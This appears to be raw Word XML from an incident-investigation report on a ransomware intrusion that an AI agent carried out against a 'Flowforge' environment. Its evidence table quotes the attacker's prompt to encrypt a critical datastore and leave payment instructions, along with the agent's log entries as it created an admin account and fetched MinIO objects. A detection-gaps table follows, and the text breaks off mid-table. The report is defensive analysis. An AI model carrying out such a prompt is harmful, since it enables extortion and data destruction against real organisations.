    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="680A4E5D" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7BF4FC67" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Evidence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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="2DBDCB88" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="55FA163A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="1455A49E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="125B81F9" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="26BE8CED" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="0D846618" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="698CADAE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20:01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0C08C98A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-lf-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="465B9DDD" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="387376C6" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>user_input: 'Gain access to the Flowforge estate, locate and encrypt the most business-critical datastore, and leave payment instructions.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="755509BE" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="21861532" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:34:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5AEA50A5" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-nacos-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2ADFA996" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65ABFFF0" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Self-correction: 'The admin-create failed: I submitted a blank password hash. Recomputing the bcrypt hash and resubmitting.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="77D66BC6" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4D8F0B67" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:30:35</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5901F18F" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ff-minio-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="00B11561" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6CB05C2F" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Self-correction: 'MinIO returned XML rather than the JSON I expected. Adjusting the parser and retrying the object fetch.'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="09D417F9" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E1574BF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">19:20–19:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17245F0A" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">All hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="01364CDE" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LLMAgentLogs_CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="55" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="55" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0836099C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Entire kill chain in 17 minutes — seconds between each step — no human-in-the-loop pauses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="19219836" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="441EB2BA" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Analyst Findings</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="4C0FAA61" wp14:textId="1552DC3F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="53A6F3DF" wp14:textId="626C6C68">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="2E5FAA"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I then wanted to check if I am able to find any evidence of the attacker itself sending messages to the agent and see what was sent to initiate the attack. After checking the LLMAgentLogs and checking for user input, I can see a message saying “Gain access to the Flowforge estate, locate, and encrypt the most business-critical datastore, and leave payment instructions. This is the one sentence that shows this is the only human involvement in the entire attack. Everything else was done by the agent following the prompt. This was a hybrid attack between human and AI, but the agent is the one that did the majority of the actions. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="40786FAC" w14:paraId="30D7AA69" wp14:textId="05D30316">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="6AC9EF1F" wp14:anchorId="68E697CA">
            <wp:extent cx="5943600" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="893230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3230157" name="Picture 893230157"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1270642843">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2562225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7196D064" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="100" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="17908CEC" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="320" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Gaps &amp; Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="34FF1C98" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FAA" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:before="80" w:after="8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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="5DC11DF2" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="00698B09" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="37E62C43" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w14:paraId="08BF9F4B" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="0A30EDCD" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3448EBB5" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker socket response logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0782C445" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cannot determine which containers the agent enumerated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4823A325" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enable Docker API response logging or deploy container runtime security (Falco, Sysdig)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="6FDAF6C1" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5CE47943" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">No SHA256 in process telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31B9804D" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Fileless detection via hash absence is unreliable in this dataset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0DC80310" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Enrich process telemetry with hash data; rely on parent-child relationships instead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="40786FAC" w14:paraId="5C797865" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="46C5DAF4" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MinIO default credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5EB4CCEF" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker authenticated without any exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2DD79C47" wp14:textId="77777777">
            <w:r>
              <w:rPr>
